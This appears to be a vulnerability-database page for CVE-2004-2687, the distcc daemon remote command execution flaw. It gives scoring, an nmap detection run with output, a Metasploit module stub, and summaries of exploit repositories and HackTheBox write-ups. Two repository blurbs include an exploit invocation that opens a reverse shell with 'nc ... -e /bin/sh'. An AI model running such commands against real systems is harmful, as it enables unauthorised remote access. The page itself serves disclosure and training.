Published: 31/12/2004 Updated: 05/09/2008

CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6

VMScore: 953

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote malicious users to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.

Vulnerable Product	Search on Vulmon	Subscribe to Product
samba samba
apple xcode 1.5

## # $Id: distcc_execrb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' class Me ...

Detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementation due to poor configuration of the service.

nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

PORT     STATE SERVICE
3632/tcp open  distccd
| distcc-exec:
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|     Description:
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|
|     Disclosure date: 2002-02-01
|     Extra information:
|
|     uid=118(distccd) gid=65534(nogroup) groups=65534(nogroup)
|
|     References:
|       http://distcc.googlecode.com/svn/trunk/doc/web/security.html
|       http://http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2687
|       http://http://www.osvdb.org/13378
|_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687

Generate vulnerable virtual machines on the fly (current team development is taking place in the cliffe/SecGen fork)

DEVELOPMENT HAS MOVED TO githubcom/cliffe/SecGen/, THIS REPO IS NOT MAINTAINED AND WILL LIKELY NOT WORK! Security Scenario Generator (SecGen) Summary SecGen creates vulnerable virtual machines so students can learn security penetration testing techniques Boxes like Metasploitable2 are always the same, this project uses Vagrant, Puppet, and Ruby to create randomly vulne

distccd_rce_CVE-2004-2687 🖥️ -k4u5h41- #️⃣ CVE-2004-2687 #️⃣ This is a Python 2 script and #️⃣ tested on kali 20212 nc -lvp 1403 python2 distccd_rce_CVE-2004-2687py -t 1010103 -p 3632 -c "nc 10101412 1403 -e /bin/sh" Vulnerability : Exploit :

DistCC exploit

DistcCC Daemon Exploit (CVE-2004-2687) This project was created with the purpose of taking full advantage of the vulnerability CVE-2004-2687 in a simple way using Python, it project allows to get remote command execution if the right conditions are given How to use python3 distcc_cve-2004-2687_exploitpy -i <ip> -p <port>

CVE-2004-2687 DistCC Daemon Command Execution

HTB write-ups going through TJnull's VM list on HackTheBox.

HackTheBox Writeups A collection of write-ups going through TJnull's VM list for machines hosted on HackTheBox Linux Boxes Machine Tags Writeup #CVE-2004-2687 #CVE-2007-2447 #CVE-2011-2523 #vsFTPd #smbd #nmap HTB Lame #shellshock #CVE-2014-6271 #perl HTB Shocker HTB Bashed #mimebypass #ifcfg HTB Networked Windows Boxes

distccd_rce_CVE-2004-2687 🖥️ -k4u5h41- #️⃣ CVE-2004-2687 #️⃣ This is a Python 2 script and #️⃣ tested on kali 20212 nc -lvp 1403 python2 distccd_rce_CVE-2004-2687py -t 1010103 -p 3632 -c "nc 10101412 1403 -e /bin/sh" Vulnerability : Exploit :

Hack the Box Ethical Hacking - Lame the targeted machine is Lame nmap First thing first, we run a quick initial nmap scan to see whihc ports are open and which services are running on those ports Run nmap to scan the machin nmap -vvv -n -Pn -p0-65535 -oG allPolrs 10129114132 # Nmap 792 scan initiated Sat Apr 9 05:28:51 2022 as: nmap -vvv -n -Pn -p0-65535 -oG allPolrs 1

Lame HTB Aujourd'hui, intéressons-nous à une autre machine HackTheBox facile créée par ch4p, Lame Nous avons l'ip (1010103) et l'OS (Linux) Après avoir lancer le même script de découverte de ports utilisé pour Legacy, le scan nous donne le nom de la machine (lame), du domaine (hacktheboxgr) et du domai

CWE-16 http://archives.neohapsis.com/archives/bugtraq/2005-03/0183.html http://lists.samba.org/archive/distcc/2004q3/002550.html http://lists.samba.org/archive/distcc/2004q3/002562.html http://www.metasploit.org/projects/Framework/exploits.html#distcc_exec http://distcc.samba.org/security.html http://www.osvdb.org/13378 https://nvd.nist.gov https://www.exploit-db.com/exploits/9915/https://github.com/SecGen/SecGen

CVE-2004-2687

Vulnerability Summary

Vulnerability Trend

Exploits

Nmap Scripts

Github Repositories

References

Vulmon Search

About

Products

Connect